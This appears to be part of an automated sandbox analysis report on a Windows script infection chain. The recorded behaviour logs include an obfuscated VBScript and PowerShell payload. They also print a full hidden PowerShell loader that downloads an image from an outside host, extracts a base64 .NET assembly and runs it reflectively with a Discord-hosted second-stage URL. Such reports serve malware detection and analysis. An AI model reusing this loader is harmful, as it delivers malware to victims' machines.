          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000008.00000002.2701828288.000002CA13776000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Network");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\Brother", "Brother");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\HP", "HP");IWshNetwork2.MapNetworkDrive("P:", "\\SRVHOMOLOGDC1\Publica", "true");IWshNetwork2.MapNetworkDrive("E:", "\\SRVHOMOLOGDC1\Digitalizacoes", "true");IHost.CreateObject("WScript.Shell");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\RD Web Access.lnk");IWshShortcut.TargetPath("http://app01.system.com.br/RDWeb/Pages/login.aspx");IWshShortcut.IconLocation("\\SRVHOMOLOGDC1\Icones\favicon.ico");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\Pasta_do_Departamento.lnk");IWshShortcut.TargetPath("S:\");IWshShortcut.WindowStyle("1");IWshShortcut.Description("Pasta_do_Departamento");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\Pasta_Publica.lnk");IWshShortcut.TargetPath("P:\");IWshShortcut.WindowStyle("1");IWshShortcut.Description("Pasta_Publica");IWshShell3.SendKeys("{F5}");IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/umxfl", "false");IServerXMLHTTPRequest2.send(); dim insubjugado , grafopsicologia , camita , massoreta , noivo , Cama , noivo1 grafopsicologia = " " camita = "" & massoreta & grafopsicologia & massoreta & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & massoreta & grafopsicologia & massoreta & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & massoreta & grafopsicologia & massoreta & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & massoreta & grafopsicologia & massoreta & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & massoreta & grafopsicologia & massoreta & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & massoreta & grafopsicologia & massoreta & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & massoreta & grafopsicologia & massoreta & "DgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTre" & massoreta & grafopsicologia & massoreta & "DgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTre" & massoreta & grafopsicologia & massoreta & "gBsDgTreGUDgTre" & massoreta & grafopsicologia & massoreta & "DgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & massoreta & grafopsicologia & massoreta & "gBvDgTreHIDgTre" & massoreta & grafopsicologia &
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTre
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&0f00cd2a30199c7965343663efb88ef5a4901642e7ee5f97d5840e8aad1eeafa=mh&0fac3366=si&07c15366=xe?txt.swodniw/6314679686261465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&0f00cd2a30199c7965343663efb88ef5a4901642e7ee5f97d5840e8aad1eeafa=mh&0fac3366=si&07c15366=xe?txt.swodniw/6314679686261465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFE1688313A push eax; ret 6_2_00007FFE16883159
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFE168809BA push E95B6AD0h; ret 6_2_00007FFE168809C9
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
